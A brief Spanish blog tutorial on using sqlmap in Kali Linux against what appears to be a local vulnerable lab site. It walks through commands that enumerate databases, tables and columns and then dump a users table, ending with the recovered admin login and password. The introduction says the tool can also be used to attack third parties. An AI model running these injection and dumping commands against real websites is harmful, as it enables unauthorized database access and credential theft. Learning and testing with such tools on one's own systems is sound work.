Sqlmap en Kali Linux

Introducción

SqlMap es una ligera pero potente herramienta que nos ayuda encontrar vulnerabilidades web-mysql en nuestros sitios web. SqlMap lo que hace es buscar alguna forma de inyectar sql y asi obtener accesos elevados. Podríamos usar esta herramienta ya sea para encontrar vulnerabilidades en nuestros sistema o para atacar a terceros. en este tutorial voy a mostrar algunos comandos basicos y una prueba de ataque y acceso a una pagina vulnerable

Instalación

1.- Vamos a obtener la bd

sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs

Esto nos debe de regresar algo asi

2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables

Este es el resultado

3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns

Este es el resultado:

4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump

Listo hemos obtenido el usuario y password.
User: admin
Password: P4ssw0rd

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *